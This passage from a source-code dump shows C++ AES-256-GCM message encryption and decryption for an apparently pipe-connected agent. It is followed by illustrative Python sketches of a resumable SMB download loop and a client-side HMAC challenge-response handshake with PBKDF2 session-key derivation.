encrypted.tag.size(); i++) { 288 | char buf[3]; 289 | snprintf(buf, sizeof(buf), "%02x", encrypted.tag[i]); 290 | oss << buf; 291 | } 292 | oss << "|"; 293 | 294 | // Ciphertext 295 | for (size_t i = 0; i < encrypted.ciphertext.size(); i++) { 296 | char buf[3]; 297 | snprintf(buf, sizeof(buf), "%02x", encrypted.ciphertext[i]); 298 | oss << buf; 299 | } 300 | 301 | output = oss.str(); 302 | return true; 303 | } 304 | 305 | /** 306 | * Decrypt a message with AES-256-GCM using session key 307 | * 308 | * Expected format: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 309 | * 310 | * @param input Formatted encrypted message 311 | * @param plaintext Decrypted message output 312 | * @return true on success 313 | */ 314 | bool decrypt_message(const std::string& input, std::string& plaintext) { 315 | if (!authenticated) { 316 | #ifdef DEBUG_MODE 317 | DEBUG_LOG_CAT("DECRYPT", "Cannot decrypt - not authenticated"); 318 | #endif 319 | return false; 320 | } 321 | 322 | if (input.substr(0, 10) != "ENCRYPTED|") { 323 | #ifdef DEBUG_MODE 324 | DEBUG_LOG_CAT("DECRYPT", "Invalid message format - missing ENCRYPTED| prefix"); 325 | #endif 326 | return false; 327 | } 328 | 329 | // Parse: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 330 | size_t pos1 = input.find('|', 10); 331 | size_t pos2 = input.find('|', pos1 + 1); 332 | 333 | if (pos1 == std::string::npos || pos2 == std::string::npos) { 334 | #ifdef DEBUG_MODE 335 | DEBUG_LOG_CAT("DECRYPT", "Invalid message format - missing separators"); 336 | #endif 337 | return false; 338 | } 339 | 340 | std::string iv_hex = input.substr(10, pos1 - 10); 341 | std::string tag_hex = input.substr(pos1 + 1, pos2 - pos1 - 1); 342 
| std::string ciphertext_hex = input.substr(pos2 + 1); 343 | 344 | AES_GCM::EncryptedData encrypted; 345 | 346 | // Parse IV (should be 12 bytes = 24 hex chars) 347 | encrypted.iv.resize(iv_hex.length() / 2); 348 | for (size_t i = 0; i < encrypted.iv.size(); i++) { 349 | sscanf(iv_hex.substr(i * 2, 2).c_str(), "%2hhx", &encrypted.iv[i]); 350 | } 351 | 352 | // Parse tag (should be 16 bytes = 32 hex chars) 353 | encrypted.tag.resize(tag_hex.length() / 2); 354 | for (size_t i = 0; i < encrypted.tag.size(); i++) { 355 | sscanf(tag_hex.substr(i * 2, 2).c_str(), "%2hhx", &encrypted.tag[i]); 356 | } 357 | 358 | // Parse ciphertext 359 | encrypted.ciphertext.resize(ciphertext_hex.length() / 2); 360 | for (size_t i = 0; i < encrypted.ciphertext.size(); i++) { 361 | sscanf(ciphertext_hex.substr(i * 2, 2).c_str(), "%2hhx", &encrypted.ciphertext[i]); 362 | } 363 | 364 | // Decrypt 365 | std::vector<uint8_t> decrypted(encrypted.ciphertext.size()); 366 | size_t decrypted_len = 0; 367 | 368 | if (!AES_GCM::decrypt(session_key, encrypted, 369 | decrypted.data(), decrypted_len)) { 370 | #ifdef DEBUG_MODE 371 | DEBUG_LOG_CAT("DECRYPT", "AES-GCM decryption failed"); 372 | #endif 373 | return false; 374 | } 375 | 376 | plaintext.assign((char*)decrypted.data(), decrypted_len); 377 | return true; 378 | } 379 | 380 | bool is_authenticated() const { return authenticated; } 381 | 382 | void reset() { 383 | SecureMemory::zero(session_key, sizeof(session_key)); 384 | SecureMemory::zero(session_nonce, sizeof(session_nonce)); 385 | authenticated = false; 386 | } 387 | }; 388 | 389 | } // namespace crypto 390 | --------------------------------------------------------------------------------
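Illustrative usage sketches. The resumable-download module and the agent authentication header above are easier to follow with a short end-to-end example of each. Both sketches are written against the code shown in this dump and are assumptions rather than repository files: helper names such as smb_read_chunk, read_exact, and write_all are hypothetical transport callbacks, and the project's own client-side code may handle these steps differently.

1. Resumable download loop. A minimal sketch driving DownloadState and parse_chunk_size, assuming both are importable from slingerpkg.lib.download_state as the source tree suggests and that the constructor takes (remote_path, local_path, total_size) as implied by load_state():

# Hypothetical resume loop around the DownloadState API shown above.
# `smb_read_chunk(remote_path, offset, length) -> bytes` is a placeholder
# for the real SMB read call; it is not a function from this repository.
from slingerpkg.lib.download_state import DownloadState, parse_chunk_size


def resume_download(remote_path, local_path, total_size, smb_read_chunk):
    """Download remote_path to local_path, resuming from saved state if possible."""
    state = DownloadState.load_state(local_path)
    mode = "ab"  # append to the existing partial file when resuming
    if state is None or not state.validate_resume()[0]:
        state = DownloadState(remote_path, local_path, total_size)
        mode = "wb"  # no usable state: start the download from scratch
    chunk_size = parse_chunk_size("64k")
    with open(local_path, mode) as f:
        while state.get_remaining_bytes() > 0:
            offset = state.get_resume_offset()
            length = min(chunk_size, state.get_remaining_bytes())
            data = smb_read_chunk(remote_path, offset, length)
            if not data:
                break  # transport returned nothing; keep the state for a later resume
            f.write(data)
            state.update_progress(len(data))  # atomically persists progress after each chunk
    if state.get_remaining_bytes() == 0:
        state.cleanup()  # remove the state file once the download completes

2. Client side of the challenge-response handshake. The agent-side code in auth_protocol.h verifies an HMAC-SHA256 keyed with its stored SHA-256 passphrase hash and derives the session key with PBKDF2-HMAC-SHA256(passphrase_hash, nonce, 10000 iterations), so a compatible client has to mirror those exact inputs. This minimal sketch uses the Python standard library plus pycryptodome (already pinned in requirements.txt); read_exact(n) and write_all(buf) are hypothetical stand-ins for the named-pipe transport:

# Hypothetical client-side counterpart to AuthProtocol::authenticate_as_agent.
# `read_exact` / `write_all` are placeholder pipe I/O callbacks, not repository functions.
import hashlib
import hmac

from Crypto.Cipher import AES  # pycryptodome

NONCE_SIZE = 16
PBKDF2_ITERATIONS = 10000
SESSION_KEY_SIZE = 32


def client_handshake(read_exact, write_all, passphrase: str) -> bytes:
    """Answer the agent's challenge and return the 32-byte session key."""
    nonce = read_exact(NONCE_SIZE)  # step 1: agent sends a random 16-byte nonce
    # The agent only stores SHA256(passphrase), so that hash is the HMAC key.
    passphrase_hash = hashlib.sha256(passphrase.encode()).digest()
    write_all(hmac.new(passphrase_hash, nonce, hashlib.sha256).digest())  # 32-byte response
    # Both sides derive the same session key from the hash and the nonce.
    return hashlib.pbkdf2_hmac("sha256", passphrase_hash, nonce,
                               PBKDF2_ITERATIONS, dklen=SESSION_KEY_SIZE)


def decrypt_agent_message(session_key: bytes, wire_msg: str) -> str:
    """Decode an ENCRYPTED|iv_hex|tag_hex|ciphertext_hex message from the agent."""
    prefix, iv_hex, tag_hex, ct_hex = wire_msg.split("|")
    if prefix != "ENCRYPTED":
        raise ValueError("unexpected message format")
    cipher = AES.new(session_key, AES.MODE_GCM, nonce=bytes.fromhex(iv_hex))
    plaintext = cipher.decrypt_and_verify(bytes.fromhex(ct_hex), bytes.fromhex(tag_hex))
    return plaintext.decode()

Because each session key is bound to a fresh random nonce, replaying a captured HMAC response against a new connection fails verification, which matches the replay-protection property claimed in the header comment.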